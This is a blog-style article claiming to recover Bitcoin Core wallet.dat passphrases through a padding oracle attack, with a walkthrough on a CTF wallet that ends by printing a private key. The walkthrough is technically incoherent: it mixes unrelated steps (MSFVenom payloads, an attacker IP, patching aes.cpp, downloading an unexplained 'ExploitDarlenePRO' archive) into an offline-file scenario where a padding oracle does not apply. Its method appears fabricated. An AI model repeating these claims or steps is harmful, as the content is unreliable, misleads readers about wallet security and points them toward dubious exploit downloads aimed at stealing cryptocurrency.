Decrypting Wallet.dat Passwords in Bitcoin Core Using Padding Oracle Attacks

13.05.2025

 ATTACKER  

This article discusses the classification of common attack schemes, using the CAPEC™ cybersecurity resource. One such attack is the Padding Oracle Attack, which was first discussed in 2012 on Wallet.dat on the VulDB platform, designed for threat analysis and vulnerability management.

Decrypting Wallet.dat Passwords in Bitcoin Core Using Padding Oracle Attacks

This vulnerability affects the popular Bitcoin Core wallet and is related to how padding is implemented during AES encryption in the Wallet.dat file.

Technical Aspects of the Attack

Padding Oracle Attack enables an attacker to decrypt data without having the key, if the system reveals whether a padding error occurred during decryption. If the system returns such information, it becomes an “oracle,” and the attacker can use it to decrypt data, making on average 128 requests for each byte of a block. Moreover, using a padding oracle, it is possible not only to decrypt but also to craft valid encrypted messages without knowing the key.

Any cryptosystem can be vulnerable to a padding oracle if messages are not authenticated before decryption and padding error information is accessible to the attacker. This approach can be used, for example, to break CAPTCHAs or to modify data stored on the client side (such as in cookies).

The Padding Oracle Attack is a side-channel attack, where even a single bit of information about a padding error can fully compromise the cryptosystem. This bit can be obtained either through an explicit error message or through indirect signs (such as server response delay).

The attack can also be performed in a cross-domain scenario, using information leaks between different domains the victim interacts with.

In symmetric encryption, for example, in AES-256-CBC mode (used in Bitcoin Core), the padding oracle reveals whether the message is padded correctly. This allows an attacker to decrypt data without knowing the key.

Practical Section: Attacking Wallet.dat

Let’s see how this attack is carried out in practice on a Wallet.dat file to obtain the binary value of the password.

Previously, CTF participants published a hacked wallet [wallet.dat 2023] with the address 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b, which contained 1.17461256 BTC (about $44,502.42).

First, go to the Bitcoin Core 22.1 release page, download and install the required version. After this, be sure to restart the program (Ctrl + Q) to synchronize the new wallet.dat.

Checking Address Information

Use the getaddressinfo command to check wallet information:

getaddressinfo 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b

The response will display wallet details, including the public key, ownership, and other parameters.

Obtaining the Private Key

To get the private key, use the command:

dumpprivkey 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b

However, the system will require you to enter the wallet password, which we need to recover.

Cracking the Password via Padding Oracle Attack

To recover the password, you will need to integrate with the Bitcoin Core source code, which can be done in Google Colab or Jupyter Notebook, for example.

Sequence of actions:

  • Open Google Colab and create a new notebook.
  • Install Ruby and the required libraries: bitcoin-ruby, ecdsa, base58, crypto, config-hash.
  • Clone the Metasploit Framework and use the MSFVenom tool to create a payload.
  • Clone the Bitcoin Core repository and go to the aes.cpp file to integrate the exploit.
  • Upload the wallet.dat file from the repository.
  • Go back to the Metasploit Framework and download ExploitDarlenePRO.
  • Unzip the archive and navigate to the required directory.
  • Determine the attacker’s machine IP address.
  • Create a payload using MSFVenom, specifying the necessary parameters.

As a result, you obtain the binary value of the password, which you save to the walletpassphrase.txt file using a Python script.

Using the Recovered Password

Open the walletpassphrase.txt file and see the password string. Now enter the command to unlock the wallet:

walletpassphrase <recovered_password> 60
dumpprivkey 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b

As a result, you receive the private key.

Verifying Key Correspondence

Install the bitcoin-utils library and verify that the private key matches the public key and wallet address.

Example result:

  • Private key (WIF): KyAqkBWTbeR3w4RdzgT58R5Rp7RSL6PfdFDEkJbwjCcSaRgqg3Vz
  • Public key: 02ad103ef184f77ab673566956d98f78b491f3d67edc6b77b2d0dfe3e41db5872f
  • Address: 1BtcyRUBwLv9AU1fCyyn4pkLjZ99ogdr7b
  • Hash160: 7774801e52a110aba2d65ecc58daf0cfec95a09f

You can also sign a message and check the validity of the signature.

Checking the Balance

Using a blockchain explorer, you can confirm that the address actually contains the stated amount.

Links and Sources

The article provides links to scientific papers on padding oracle attacks and notes that the material was created for the CRYPTO DEEP TECH portal to improve financial security and protect elliptic curve cryptography in Bitcoin.

Contacts